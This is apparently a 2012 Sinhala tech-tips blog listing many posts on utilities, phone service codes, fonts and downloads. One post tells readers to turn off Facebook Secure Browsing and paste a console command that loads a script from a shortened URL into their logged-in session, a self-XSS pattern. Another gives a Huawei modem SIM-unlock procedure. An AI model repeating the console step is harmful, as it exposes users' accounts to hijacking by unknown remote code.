-moz-user-select:none; -webkit-user-select:none; -khtml-user-select:none; -ms-user-select:none; user-select:none;

තවත් එක් හීනයක්

පිපෙන්නට වෙරදරන සහිනයට ඉඩ දෙන්න

දන්න දේ තේරෙන ලෙස ඔබ වෙතට දෙන තවත් එක් සහිනයක්

Pen එකකින් Computer එකක් Format කරමු

ඔයාල ඔක්කොමල වගේ කොම්පියුටර් කෑල්ලක් ‍‍‍ෆෝමැට් කරන්න දන්නවනේ නේද?

අපේ Drivers (ඩ්‍රයිවර්ස්) අපිම දා ගමු

ෆෝමැට් කරල ඉවර උනාම සද්ද බද්ද රූප නැති වෙනකොට තමයි උස්සල පොළවෙ ගහන්න හිතෙන්නෙ. මොනව කරන්නද ඒත්. අමාරුවෙන් ගත්ත කොම්පියුටර් කෑල්ල පොළවෙ ගහන්නය නේද?

තමන්ටම කියල QR code එකක් හදාගමු

ඇත්තටම මේ QR code එකෙන් මොකක්ද වෙන්නේ. QR code කියන එකේ තේරැම මොකක්ද? Quick Response Code (ක්ෂණික ප්‍රතිචාර කේතය). ඇත්තට මේකෙන් වෙන්නේ වැඩි දත්ත සංඛ්‍යාවක් මේ තුල ගබඩා කරගැනීමේ හැකියාවයි.

Sunday, September 30, 2012

තමන්ටම කියල QR code එකක් හදාගමු

                          
                        කොහොමද කට්ටියට. ඔන්න මම අද ඔයාලට අලුත්ම දෙයක් ගෙනාව. සමහර අයටනම් මේක අලුත්ම අත්දැකීමක් වෙයි. සමහර අයනම් මේ ගැන දන්නවත් ඇති. ඔයාල මේක කලින් දැකල ඇති එත් මේක මොකක්ද කියල හරි හැටි විස්තරයක් දන්නේ නැතිව ඇති. මේක තමයි QR code. මේක ලෝකෙට හදුන්වලා දීල තියෙන්නේ  Toyota  සමාගම විසින් 1994 දී. මේක අද වන විට ලෝකයේ ගොඩාක් අය භාවිතා කරනවා.




                         ඇත්තටම මේ QR code එකෙන් මොකක්ද වෙන්නේ. QR code කියන එකේ තේරැම මොකක්ද? Quick Response Code (ක්ෂණික ප්‍රතිචාර කේතය). ඇත්තට මේකෙන් වෙන්නේ වැඩි දත්ත සංඛ්‍යාවක් මේ තුල ගබඩා කරගැනීමේ හැකියාවයි. ඒ වගේම මේ කේතය ඉතා ඉක්මනින් හා පහසුවෙන් කියවීමේ හැකියාවක්ද තියෙනවා. කියවනව කිවුවට අහෙන් බලල කියවන්න බෑ එකට වෙනම උපාංගයක් ඕන. දැන්නම් ජංගම දුරකතන වලින් කියවන්න පුළුවන්. ඒත් හැම එකකින්ම බෑ. Apple, Android, Windows වගේ අලුත්ම ඒවගෙන් පුළුවන්. එත් ඒකට සොෆ්ට්වෙයාර් එකක් ඕන. ඒකත් දෙන්නම්. 





                        QR code ගැන යම් තරමේ දැනුමක් ලැබුන නේද? ඔයාලටත් තමන්ගේම කියල QR code එකක් තියෙනවනම් කොහොමද. හරි මං දැන් කියල දෙනන්ම්කෝ කොහොමද හදාගන්නේ කියල. පහල සිහිනයට ගිහින් QR code එක හදාගන්නකෝ.


මෙතනින් ඔයාලගේ QR code එක හදාගන්න

                      දැන් ඔයාලටම කියල  QR code එකක් හදාගත්තනේ නේද? දැන් පහල සිහිනයට ගිහින් ඔයාගගේ දුරකතනයට ගැලපෙන සොෆ්ට්වෙයාර් එක භාගන්නකෝ. ඒකර ඹයාල බලන්නකෝ වැ‍ඩේ හොදද කියල. මේක තමයි අලුත්ම තාක්ශණය. තාක්ශණයත් එක්ක අපිත් දියුණු වෙන්න ඕනනේ. නැත්තම් වැඩක් නෑනේ නේද? ඔයාල යම් දෙයක් ඉගෙන ගත්තනම් මේ උත්සාහය ගැන මොනව හරි ලියලම යන්න.

මෙතනින් භාගන්න


Thursday, September 27, 2012

screen එකේ image එකක් ගමු



                           ඉතින් කොහොමද කස්ටියට. ඔන්න මම අදත් ආව. අද මම දෙන්න හදන්නේ සොෆ්ට්වෙයාර් එකක්නම් නෙවෙයි. පොඩි වැඩ කෑල්ලක්. ඔයාල දැකල ඇති සමහර තැන්වල Desktop එකේ ෆොටෝස් දාල තියනව. ඇත්තටම කොහොමද මේ image එක ගන්නේ. සමහර අයනම් දන්නවත් ඇති නේද? හරි නොදන්න අය අහගන්නකෝ....

                          ඔයාලගෙ computer එක මොකක් උනත් කමක් නෑ. මෙකක් උනත් කමක් නෑ කිවුවේ laptop, desktop හරිද. ම්ම්ම්... දැන් ඔයාලගේ keyboard එකේ බලන්න prt scrn (print screen) කියල key එකක් තියනවද කියල.


(සමහර  keyboard වල prt scrn (print screen) key එක එක එක තැන්වලයි තියෙන්නෙ හෙදේ)

                 හරි ඔයාලට ගන්න ඕන image එක Desktop එක කියල හිතමුකෝ. මේක කරන්න හරිම ලේසියි. ඔයාලට තියෙන්නේ prt scrn (print screen) key එක එක පාරක් ඔබන එකයි. හරි ඉතින් එබුවයි කියමුකෝ. කෝ image එක. ඔයාලගෙ image එක ගන්න ඕනනම් Microsoft Office Word එකේ හෝ Adobe Photoshop වගේ සොෆ්ට්වෙයාර් එකක් පාවිච්චි කරන්න ඕන. එකරල Microsoft Office Word එකේනම් right click කරල  paste කරාම වැඩේ හරි. Adobe Photoshop එකේනම් new window එකක් අරගෙන ඒක උඩ right click කරල  paste කරානම් වැඩේ හරියනව.

              ඉතින් දන්නෙ නැති අයට ගොඩක් වටි කියල හිතනව.මේ ගැන මේ වැඩේ හොදයිනම් මොනව හරි අදහසක් දාලම යන්න.  







Sunday, September 23, 2012

singreesi වලින් සිංහල ලියමු.

                     

                       කොහොමද යාළුවන්ට. ඔන්න මම අදත් ඔයාලට වටින කියන සොෆ්ට්වෙයාර් කෑල්ලක් ගෙනාව. මටනම් මේක ගොඩක් වටිනව. ඔයාලටත් ගොඩක් වටිනව කියල දන්නවා. මේක හදල තියෙන්නෙත් ලංකාවේ අපේ සිංහ පැටියෙක්. ආඩම්බරයි නේද?

                         මේකේ නම තමයි singreesi. ඒ කියන්නේ අපි ඔය sms ගහන්නේ. අන්න එහෙම  singreesi වලින් ගහපුවාම නිකම්ම ඒ වචන ටික සිංහල වලට හැරවෙනව. කොහොමද වැඩේ හොදයි නේද? තේරැනේ නැත්තම් පහල පින්තූරෙත් බලලම ඉන්නකෝ.

             
                         දැන් තේරැනා නේද? ඉතින් මේක ඔයාලට ගොඩක් වටිනව නේද? මෙකෙන් ඔයාලට ඕන දේ ලියාගෙන ඒ දේ copy කරගෙන තමන්ට ඕන තැනකට paste කරගන්න පුළුවන්. හරිම ලේසියි. ඉතින් මම හිතනව මේ උත්සාහය ගැන මොනව හරි ඔයාලගෙ අදහස් ලියල යයි කියල. එහෙනම් මම ගියා. පල්ලෙහා පින්තූරෙන් සොෆ්ට්වෙයාර් කෑල්ල ගන්න පුලුවන්.

සිහිනයට පිවිසෙන්න


Monday, September 17, 2012

Delete වුන file නැවත ගන්න



                   කස්ටියට කොහොමැයි ආ... ඔන්න මම අදත් පොඩි ගැජමැටික්ස් සෙෆ්ට්වෙයාර් කෑල්ලක් ගෙනාව. ඔයාල පරිගණකයේ වැඩ කරනකොට ඔයාලට වැදගත් දෙයක් ඩිලීට් උනොත් මොකද කරන්නේ.( වෙන්ට වයිෆ්ගේ ෆොටෝ එකක් එහෙම මැකුනොත්) මොන දෙයියට කියන්නද නේ. හරි අන්න එහෙම දෙයක් මැකුනොත් කියන්න ඉන්න දෙවි කෙනෙක් තමයි දෙනන් යන්නේ. ඇත්තටම කිවුවොත් මේක රිකවරි සොෆ්ට්වෙයාර් කෑල්ලක්. මෙකෙන් වැඩ කරන්න හරිම ලේසියි. මමත් මේක තමයි දාගෙන ඉන්නේග එහෙනම් පහල්ලෙහා සිහිනයට ගිහින් දෙවියන්ව වඩම්මවා ගන්න. මේක කියවල නිකම්ම යන්න එපා පල්ලෙහා තියන කමෙන්ට් කියන් තැන මේ දෙවියන් ගැන මොනව හරි යලම යන්න. එහෙනම් මං ගියා ඕං...

සිහිනයට පිවිසෙන්න


Sunday, September 16, 2012

facebook group එකට ගෙඩිය පිටින් කස්ටිය බස්සමු

                     


                        ඉතින් යාළුවනේ මම ඔන්න අද දවසට දෙන දෙවැනි ලිපිය. මට මගේ හොදම යාළුවෙක් (යාළුවෙක් කිවුවට මාළුවෙක් වගේ) කිවුව එයාගේ group එකට කස්ටිය ටිකක් දාල දෙන්න කියල. එයාගේ group එක කිවුවට ඒක අපේ වගේ. ඉතින් යාළුවගේ නමත් කියන්නම්කෝ. නමින් අමිල මට ඇහිල තියනව සමහරැ -තෙලා- කියනව. ආදරේට වෙන්න ඇති. හරි ඉතින් කොහොම හරි දැන් මට කිවුවනේ කස්ටියව එකතු කරන්න කියල. කියපු හින්ද කරන්නත් ඕනනේ.එක එක බුවාල තෝර තෝර add කරන්න ගියාම එපා වෙනව නේ. ඉතින් මන් පොඩි ජිල්මාට් වැඩක් කරල මගේ facebook profile එකේ හිටපු කස්ටිය ඔක්කොම ගෙඩිය පිටින්ම group එකට බැස්සුවා. වැ‍ඩේ නම් එල කිරි වගේ. අනේ මට ඉතින් අපේ group එක මොකද්ද කියල කියන්න බැරි උනානේ.ITnow (Any IT point, Share With ITnow) ඔන්න ඔය නම තමයි අපේ group එක.

හරි දැන් අපි වැඩේ කරන්නේ කොහොමද කියල බලමුකෝ.

                            මුලින්ම ෆේස්බුක් ගිණුමෙ Secure Browsing OFF කරන්න ඕන. ඒක කරන විදිය දන්නේ නෑ වගේනම් ඔය දීල තියන විදියට කරන්නකෝ Facebook Account Settings >> Security Settings >> Secure Browsing එක disable කරලා Save කරන්න.වැඩේ හරිද? ඔන්න මේකෙනුත් බලා ගන්නකෝ.



                    දැන් ඉතින් ඔන්න ඒ වැඩෙත් හරි. මං අහල තියනවා එක එක කෙහෙල් ගෙඩි වලට එක එක .............. එවා කියලා. ඇය හිනාවෙන්නේ. අන්න ඒ වගේ ඔයාල පාවිච්චි කරන Brows වලට වෙන වෙනම මේ වැඩේ කරන්න ඕන. හරිනේ එහෙනම්.


  • මුලින්ම google chrome සදහා.
*  මුලින්ම ඔයාලට ඕන group එක තෝර ගන්න. 
*  Page එක කොහෙ හරි Right Click කරල "Inspect Element" අරගන්න. එහි අවසානයට ඇති  "Console"   තෝරන්න. මේ වැඩේ තේරැනේ නැති අය කෙලින්ම "F12" ඔබන්න. ආ දැන් හරිනේ.
*  ඊට පස්සේ  "Console"  එක මගින් open වු බාර් එකේ right click කරල clear Console දෙන්න.
*  අන්තිමේට මෙන්න මේ ටික copy කරල past කරල enter කරන්න .

document.body.appendChild(document.createElement('script')).src='http://goo.gl/aQwsk';

  • Mozilla Firefox සදහා.
*  මුලින්ම ඔයාලට ඕන group එක තෝර ගන්න. 
*  CTRL + SHIFT + K යතුරු එකවර තදකරන්න.
*  අන්තිමේට මෙන්න මේ ටික copy කරල past කරල enter කරන්න .

document.body.appendChild(document.createElement('script')).src='http://goo.gl/aQwsk';

            දැන් වැඩ ටික ඔක්කොම හරි.   බලන් ඉද්දි කස්ටිය group එකට පෝලිමේ එනව. ඉතින් මේ ගැන මොනව හරි කියලම යන්න.

           ආ.... ඔයාල මේක කරලම බලන්න. මට කරන පොඩි උදව්වක් විදියට මේ group එකට කස්ටිය ටිකක් දාල දෙන්න. මෙන්න group එක.



Format වෙන්නෙ නැති pen, sd card ලේසියෙන්ම format කරමු.



                                     කොහොමද කස්ටියට. ගුඩ් මෝර්නින් කිවුවා. ඉතින් ඔන්න මම අදත් ආව ඔයාලට ගොඩක් වැදගත් දෙයක්  අරගෙන.මම අහල තියනවා ඔයාලගේ සමහර පෙන් ෆෝන් චිප් ෆෝමැට් කරන්න බෑ කියල. ඔයා ලගත් තියනවද? ඔන්න ඉතින් ඒ විදියට ෆෝමැට් කරන්න බැරි දේවල් ලේසියෙන්ම ෆෝමැට් කරල දෙන පොඩි සොෆ්ට්වෙයාර් කෑල්ලක් තමයි දෙන්න යන්නෙ. වැඩේ නම් හොදයි නේද? කරලම බලන්නකෝ කොහොමද කියල. වැඩේ ගොඩ වගේනම් මොනවහරි අදහසක් දාලම යන්න.පහල සිහිනයෙන් සොෆ්ට්වෙයාර් එක බාගන්න.

සිහිනයට පිවිසෙන්න



Friday, September 14, 2012

Hard drive චෙක් කරන ඩොක්ටර් අංකල්




                                          කොහොමද ඉතින් යාළුවන්ට. ඔන්න මම අදත් ඔයාලට ගොඩක් වටින් දෙයක් ගෙනාව. ඇත්තටම යාළුවනේ මට පොඩි දුකකුත් තියනවා. මොකද දන්නවද මම මෙච්චර කල් ලියපු එක පෝස්ට් එකකටවත් තවම කමෙන්ට් එකක් හම්බවුනේ නෑනේ. කමක් නෑ මේකටවත් කමෙන්ට් එකක් දායි කියල හිතනව.

                                        හරි මේකයි වැඩේ. ඔයාලගෙ පරිගණකය හොදින් වැඩකිරීමට ඒකෙ හාඩ් ඩිස්ක් එක හොද තත්වයකින් තියෙන්න ඕන. ඒ කියන්නේ ලෙඩ නැතිව. මොකෝ ලෙඩ තියනවද කියල බලන්න ඩොක්ටර් අංකල්ට පෙන්නන්නද නේද. පැනඩෝල් දෙන්න ද? බෑ නේ. දැන් මන් කියල දෙන්න හදන්නේ හාඩ් ඩිස්ක් එකේ ලෙඩ තියනවද කියල බලා ගන්න පුළුවන් ඩොක්ටර් කෙනෙක් ගැන. වැඩේනම් ‍හොදයි නේද?

මේ ඩොක්ටර් අංකල් ඔන්න ඹය පල්ලෙහා තියෙන් ලෙඩ ටික අල්ල දෙනව.


  • Hard drive name - හාඩ් ඩිස්ක් එකෙහි වෙළද නාමය
  • Hard drive type -  හාඩ් ඩිස්ක් එක මවු පුවරැවට සම්බන්ධ කරන ආකාරය
  • Hard drive size -  හාඩ් ඩිස්ක් එකෙහි සම්පූර්ණ ධාරිතාවය
  • Hard drive health -  හාඩ් ඩිස්ක් එකෙහි දෝෂ ඇතොත් ඒවා
  • File system -  හාඩ් ඩිස්ක් එක ‍‍ෆෝමැට් කර ඇති ෆයිල් ෆෝමැට් එක
  • Memory usage -  හාඩ් ඩිස්ක් එක භාවිතා කර ඇති ආකාරය
                            මීට වඩා දේවලුත් කරන්න පුළුවන්. කරලම බලමුකෝ නේද?
ආ..... මේ ඩොක්ටර් අංකල්ව ඔයාලගෙ පරිගණකයටත් ගෙන්න ගන්න ඕනනේ නේද? පල්ලෙහා ඉන්නවා ඕන්න...

එහෙනම් මම ගියා. මතක් කරල කමෙන්ට් එකක් දාල යන්න........


සිහිනයට පිවිසෙන්න



Thursday, September 13, 2012

ජංගම දුරකතන secret codes

                                                


                                   මම දන්න තරමින් මගේ යාළුවෝ  ඔක්කොමලම වගේ ජංගම දුරකතනයක් පාවිච්චි කරනවනේ. එකක් නෙවේ දෙක තුනක් පාවිච්චි කරන අයත් ඉන්නවනේ නේද? ඉතින් මං දැන් කියල දෙන්න හද්නනේ ඔයාලගේ ජංගම දුරකතනයේ වර්ගය මොකක් උනත් ඒවට අදාල secret codes ටිකක් කියල දෙන්න. කොහොමද වැඩේ. එල නේ. එහෙනම් අපි මුල ඉදන්ම වැඩේ පටන් ගමු නේ,,,


Nokia ÿrl;kj, iSl%Ü fldaâ
³ *#92702689# - ÿrl;kh Ndú;d lr we;s ld,h wd§ f;dr;=re
³ *#0000# - uDÿldx. ixialrK wxlh
³ *#7780# - l¾udka;Yd,dfõ uq,a ieliqug ÿrl;kh m;a lrhs
³ 0 - m%Odk ;srfha§ 0 uo fõ,djla ;o lrf.k isák úg jema n%õi¾ tlhg fhduqfjhs
³ *#06# - IMEI wxlh n,d .; yelsh

Sony Ericsson ÿrl;kj, iSl%Ü fldaâ
³ fidaks tßlaika ÿrl;kj, iSl%Ü fukq tl ,nd .ekSu ioyd fcdhsiaála lS tl iu. * ,l=K Ndú;fhka my; l%shdldrlu l, hq;=h
"*!!*!*
³ #82# - uDÿldx. ixialrK wxlh
³ 0# - wjika jrg vh,a lrk ,o wxlh ,nd.; yel

Samsung Android ÿrl;kj, iSl%Ü fldaâ
³ *#*#7780#*#* - l¾udka;Yd,dfõ uq,a ieliqug ÿrl;kh m;a lrhs
³ *#*#232331#*#* - íÆgQ;a mÍlaIdj isÿ l, yel
³ *#*#0#*#* - LCD tl mÍlaId l, yel
³ *#*#2663#*#* - gÉ ial%Skatflys ixialrKh mÍlaId l, yel

Samsung ÿrl;kj, iSl%Ü fldaâ
          ³ *#9999# fyda *#0837# - uDÿldx. ixialrK wxlh
          ³ #9125# - uDÿldx. ixialrK wxlh
³ *#9998*246# - ãn.a fukqj fmkajhs
³ *#9998*523# - jhsfí%Ika mÍlaId l, yel
³ *#9998*837# - ydâjhd ixialrKh fmkajhs
³ #*2562# fyda #*3849# - ÿrl;kh ÍiagdÜ l, yel

LG  ÿrl;kj, iSl%Ü fldaâ
                ³ 2945#*# fyda 2945*#01*# - iSl%Ü fukq tl ,nd .ekSu
          ³ *#07# - fuu.ska LG B1200 ldKavfha ÿrl;kj, uDÿldx. ixialrK wxlh ,nd .; yel
          ³ *6861# - l¾udka;Yd,dfõ uq,a ieliqug ÿrl;kh m;a lrhs
          ³ 2945#*# - uDÿldx. ixialrK wxlh ,nd .; yel

MOTOROLA  ÿrl;kj, iSl%Ü fldaâ
                ³ #02#* fyda *#**837# - fid*aÜfjhd ixialrKh ±k.; yelsh
          ³ **0102# fyda *#**367628# - l¾udka;Yd,dfõ uq,a ieliqug ÿrl;kh m;a lrhs

ALCATEL  ÿrl;kj, iSl%Ü fldaâ
          ³ *#06# - uDÿldx. ixialrKh yd IMEI wxlh ,nd .; yel
          ³ *#4837*# fyda *#837# - fid*aÜfjhd ixialrKh ±k.; yelsh
          ³ ###847# fyda *#73738# - l¾udka;Yd,dfõ uq,a ieliqug ÿrl;kh m;a lrhs

BLACKBERY  ÿrl;kj, iSl%Ü fldaâ
                ³ Alt  h;=r ;o lrf.k R,B,V,S  hk wl=re ;o lsÍfuka fjí msgqjl fldaâ n,d .; yel
          ³ Alt iy (left) Shift h;=r ;o lrf.k H wl=r ;o lsÍfuka fy,ama fukq tl ,nd.; yel
          ³ negßh .,jd Alt + (left) Shift + Del hk h;=re ;o lsÍfuka fid*afjhd ÍfiÜ l, yel



Wednesday, September 12, 2012

සුපිරි video player එකක්

                           


             කොහොමද කස්ටියට ආ....... ඔන්න මං අද ඔයගොල්ලන්ට ගෙනාව සුපිරි video player එකක්. සමහර විට ඔයාල ලග මේක ඇති. නැති අය දා ගන්නකෝ. ඇත්තටම මේකේ වැඩ කිඩ ගොඩාාාායි. වආාා මේකෙ නම තමයි jetvideo. මොකක් හොදට අහල පුරැදුයි නේ. ආ ඒ jetaudio නේ. හරි හරි මේ අය අයිය මලෝ කියිල හිතාගෙන දාගෙන බලන්නකෝ හොදයිද කියල. මේ ඇත්තටම ඔයාලට මේ ගැන කියන්න මොනවත්ම නැද්ද ආාා....

සිහිනයට පිවිසෙන්න


Friday, September 7, 2012

ඔයාලගේ Dongle එකත් lock ද? මෙන්න විසදුම

මොඩෙම් lock/unlock කිරීම ලංකාවේ නීති විරෝදී දෙයක් නෙවෙයි. ඒත් එමගින් තමන්ගේ සේවාදායකයා සමග ඇති සෙවා ගිවිසුම අවලංගු වෙන්න පුලුවන්. ඒක නිසා මේක කරන්න කලින් ඒ ගැන සැලකිලිමත් වෙන්න.
මේ කියන ක්‍රමය Huawei USB 3G/HSDPA මොඩෙම් ඕනෙම මාදිලියකට වලංගුයි.

මොඩෙම් එකක් unlock කරගන්න මුලින්ම ඔන වෙන්නෙ අදාල කේත අංකයයි (unlock code). හුවාවි මොඩෙම් සදහා මේ කේත අංකය පදනම් වෙලා තියෙන්නෙ මොඩෙම් එකේ IMEI නොම්බරය මතයි. ඒක නිසා මුලින්ම මොඩෙම් එකෙ IMEI අංකය හොයගන්න. මේක ඉලක්කම් 15 ක නොම්බරයක්. මේක මොඩමෙයෙම හෝ ඇසිරුමෙ සදහන් කරලා තියෙනවා. නැත්නම් Mobile partner එකෙ Tools -> Diagnostic යටතේ බලාගන්න.


මෙ අංකය 354300020014078 යයි සිතමු. දැන් අදාල unlock කෙතය සොයගමු. මේකට කරන්න තියෙන්නෙ IE, Firefox වගේ ඕනම browser එකක් ඇරලා address එක වශයෙන් 
http://bb5.at/huawei.php?imei=###############
ලබ දෙන එකයි. මේ address එකේ ############## වෙනුවට මොඩමයේ IMEI අංකය යොදගන්න. අපේ උදාහරනයේ විදිහටනම්
http://bb5.at/huawei.php?imei=354300020014078

(needs internet connection)

එවිට ඔබට මෙවන් පිටුවක් ලැබෙවි. මෙකෙ අදාල unlock code එක සදහන් වෙනවා.


අපේ උදාහරනයේ විදිහටනම් unlock code එක 41850586

දැන් කොහොමද unlock කරන්නේ. වෙන SIM එකක් දැම්මම Mobile partner ම unlock code එක ඉල්ලනවා නම් මේ code එක එන්ටෙර් කරන්න. එහෙම නැත්නම් පහත ක්‍රමය කරන්න

මුලින්ම මොඩෙම් එක සම්බන්ධ කරලා mobile partner රන් මෙවවනම් එකෙන් exit වෙන්න. ඊට පස්සෙ settings->control panel->system->hardware->device manager open කරගන්න. දැන් ports යටතේ HUAWEI Mobile Connect – 3G PC UI interface කියන එක හොයාගෙන එකත් එක්ක තියෙන COM පොර්ට් නොම්බරය බලාගන්න. 



අපේ උදාහරනයේ විදිහටනම් COM4.

ඊලගට programs ->accessories ->communications –>Hyperterminal
වෙත ගොස් HyperTerminal window ලබාගෙන කලින් බලාගත් පොර්ට් එකට සදහා පිහිටුම් සකස් කරගන්න.



දැන් HyperTerminal එක connect කරගන්න.


දැන් මේ එකේ AT (A යතුර, T යතුර සහ Enter යතුර) විධානය ලබාදෙන්න. එතකොට සියල්ල නිවරදිව තිබෙනම් "OK" යනුවෙන පිලිතුරු ලබෙවි. මීලගට 


AT^CARDLOCK= "########" විධානය ලබාදෙන්න.  ######## කියන්නේ අදාල කේත අංකයයි. අපේ උදාහරනයේ විදිහටනම්
AT^CARDLOCK="41850586"

එවිට පිලිතුරු වශයෙන්
^CARDLOCK 2,10,0 ලබෙවි.

දැන් unlock කිරීම ඉවරයි. මොඩෙම් එක කැමති විදිහකට පාවිච්චි කරන්න පුලුවන්. වෙනස් පිලිතුරක් ලැබුනොත් යම් තැනක වරදක් වෙලා තියෙනවා. නැවත උත්සාහ කරන්න කලින් මේකෙ comment එකක් දාන්න. (උත්සාහ කරන්න පුලුවන් 10 වරක් පමනයි


(සදීපගේ වෙබ් සටහනින් උපුටා ගන්නා ලදි)

Thursday, September 6, 2012

හැඩ වැඩ දාල සිංහලෙන් ලියමු



                                   මං මේ හදිස්සියේ මේ පැත්තට අවේ. ඇයි දන්නවද මට ඔයාලට දෙන්න ගොඩක් වටින දෙයක් හම්බුනා. මමත් අර මොකාද එකා වගේ net එකේ එහා මෙහා ඇවිදිනකොට තමයි මේක ගිහින් කකුල හැප්පුනේ.බලනකොට පට්ට වටිනවා ඈ. ඇත්තටම මොකක්ද මේ. මේ තමයි ඔයාලට ගොඩක් වටින sinhla font ටිකක්. අපෝ කියල හිතෙයි ටිකයි කියුව නිසා නේ. ටිකක් කිවුවට ටිකක්ම නෙවෙයි sinhla font 1777 ක්ම තියනවා. මොනව 1777 ක්. බඩුම තමයි නේ. වටිනව නේ. එහෙනම් පල්ලෙහා තියෙන් සිහිනයට තට්ටුවක් දාලා බාගන්න හොදේ. මේ මේ ගැන ඔයාලට කියන්න මොනවත්ම නැද්ද අනේ...

සිහිනයට පිවිසෙන්න


දන්නෙ නැති වචන සිංහලෙන්

                   
                   කොහොමද යාළුවනේ. මම අද දෙන්න යන්නේ පොඩි Dictionary කෑල්ලක්.මේකෙන් ඕනම english වචනයක් සිංහලට හරවන්න පුළුවන්.මේක online software එකක්.වැඩි වැඩ ඕන නෑ. කරලම බලන්නකෝ හොදද කියල. යාළුවනේ comment එකක් දාලම යන්න.

සිහිනයට පිවිසෙන්න


Monday, September 3, 2012

සල්ලි නොගෙව මල් කඩන්න








                                                           ඉතින් කොහොමද යාළුවනේ. මේ ඔයගොල්ලෝ මල් එහෙම හොදට කඩනව ඇති නේ. මල් ගැන ආයෙ ඉතින් අමුතුවෙන් කියනන් ඕනයැ නේ. හරි හරි මේ ඔය මල් කඩන අයට බර වියදම් ඇති නේ. කොහොමද මුළු දවසම නිකන් මල් කඩන්න තියන්වනම් නේ. මොකක් නිකම්ම නිකම්.. ම් ම් ම්.. මෙන්න මෙහෙමයි නිකන් මල් කඩන්නේ ඒ කියන්නේ ඕනම network එකකට free call ගන්න විදියක් ගැන. සමහර යාළුවන් මේක ගැන දන්නවත් ඇති. නොදන්න අය ඉගෙන ගන්නකො එහෙනම්. මේක පොඩි software කෑල්ලක්. හැබැයි යාළුවනේ මේ software එක දාල call ගන්න පුළුවන් මේ software එක දාපු තවත් දුරකතනයකට විතරයි. අවුලක් නෑනේ නේද? ඔයාලගෙ phone එක මොකක් උනත් මේක දාගන්න පුළුවන්. පහළ සිහිනය පිරිමැදල  software එක බාගන්නකෝ. යාළුවනේ මගේ උත්සාහය ගැන මොනවහරි දෙයක් ලියල යන්න. ලයික් එකක් දානන් අමතක කරන්න එපා හොදේ...

සිහිනයට පිවිසෙන්න


Sunday, September 2, 2012

web page වල printout ලබා දෙන නියම වැඩකාරයා


ඉතින් යාළුවනේ කොහොමද? මම ඔන්න තවත් පොඩි දෙයක් හොයාගත්තා. මේකත් ඔයාලට ලොඩක් වැදගත් වෙයි කියල හිතනවා. මෙකෙන් වෙන මූල්කම දෙ තමයි වෙබ් පිටු වල printout ඉතා පහසුවෙන් ලබා ගැනීමට හැකිවීම. ඒ විතරක් නෙවෙයි එලෙස printout ලබා ගැනීමේදී අපට අනවශ්‍ය පිටු print වීම වලකා අපට අවශ්‍ය පිටු පමණක් print කරගන්න පුළුවන්ග මේක ඔයාලට වැදගත් දෙයක් නේද? යාඵවනේ.ඉතින් මගේ වැඩේ නම් හරි. ඔයාලට පුළුවන්නම් මේ සිහිනයට යම් දෙයක් එකතු කරන්න. පහල සිහිනය තුලින් වැඩේ කරගන්න.

සිහිනයට පිවිසෙන්න


පෝස්ට් කෝඩ්ස් සොයා දෙන online හිතවතා



                       යාළුවනේ ඔයාලගෙන් කවුරැ හරි ඔයාලගේ තැපැල් සංකේත අංකය ඉල්ලුවොත් ඔයාලට දෙනන් ඒක මතකද? සමහර අයටනම් මතක ඇති. හරි කමක් නෑ මම දැන් දෙන්න යන්නේ ලෝකෙ ඕනම තැනක තැපැල් සංකේත අංකය එහෙමත් නැත්තම් postcode එක ලෙහෙසියෙන්ම හොයාගන්න පුළුවන් විදියක් ගැන. මේකනම් ඔය ගොල්ලන්ට ලොඩක් වටීවි කියල හිතනවා. මේකෙ තියන ලොකුම වාසිය තමයි මෙම සේවාව online විදියට තමයි ලබා දෙන්නේ. බලන්නකෝ හොදයිද කියල.

සිහිනයට පිවිසෙන්න


video පහසුවෙන් download කරගන්න නියම බඩ්ඩ


                        කොහොමද යාළුවනේ. ඔන්න මම තවත් පොඩි software කෑල්ලක් ගැන කියන්නයි හදන්නේ. මම හිතන්වා මේක ඔයාලට ගොඩක් වැදගත් වෙයි කියල. මේකෙන් වෙන්නේ ඔය එක එක web site වල තියෙන video clip ගොඩක් ඉක්මනට download කර දෙන ඩවුන්ලෝඩ් මැනේජර් මෘදුකාංගයක්.කරලම බලන්නකෝ. මෙන්න link එක. උත්සාහය අගේ කරනවන්ම් මොනව හරි ලියලම යන්න.

සිහිනයට පිවිසෙන්න



Saturday, September 1, 2012

Face book chat with Cool Smileys
ආයුබෝවන් කියල පටන් ගන්නම්.මමත් එකක් හැදුව. ඉතින් තවමත් හදනව. අඩු පාඩු ගොඩක් ඇති.ඒවට සමා වෙන්නග කලින් දාපු ලිපි එක එක්කෙනාගෙන් අරගෙන තමයි දැම්මෙ. මෙන්න මගේ පළවෙනි ලිපියග අපි කවුරැත් Facebook එකෙන් Chat කරනවනේ. ඉතින් ඒ Chat කර එකට තවත් විනෝදයක් ගේන පොඩි වැඩ කෑල්ලක් තමයි මෙක. ඉතින් යාළුවනේ මෙක දාගෙනම බලන්නකෝ හොදයිද කියල. ‍මෙන්න LINK එක.

සිහිනයට පිවිසෙන්න


GOOGLE chrome එකෙන් Video Download කරගමු
කොහොමද කස්ටිය.....YouTube එකෙන් කොහොමද Videos Download කරන්නෙ..හොයල බලන කොට Google Chrome එකෙන් ලෙහෙසියෙන්ම YouTube Videos Download කරන ක්‍රමයක් හම්බ වුනා...ඔයාලටත් ඕන නම් මේක අත්හදා බලන්න. පළමුව Google Chrome නැත්නම් බාගෙන Install කරන්න. ඊට පස්සෙ මෙතනට ගිහිල්ල "Add to Chrome" කියන එක Click කරල Install කරන්න,දැන් වැඩේ හරි. දැන් YouTube එකේ කැමති Video එකක් Open කරන්න Share Button එකට දකුණු පැත්තෙන් මෙසේ Download Button එකක් පෙනේවි.ඒක Click කරල Video එක Download කර ගන්න. http://dulara-dulara.blogspot.com උපුටා ගන්නා ලදි

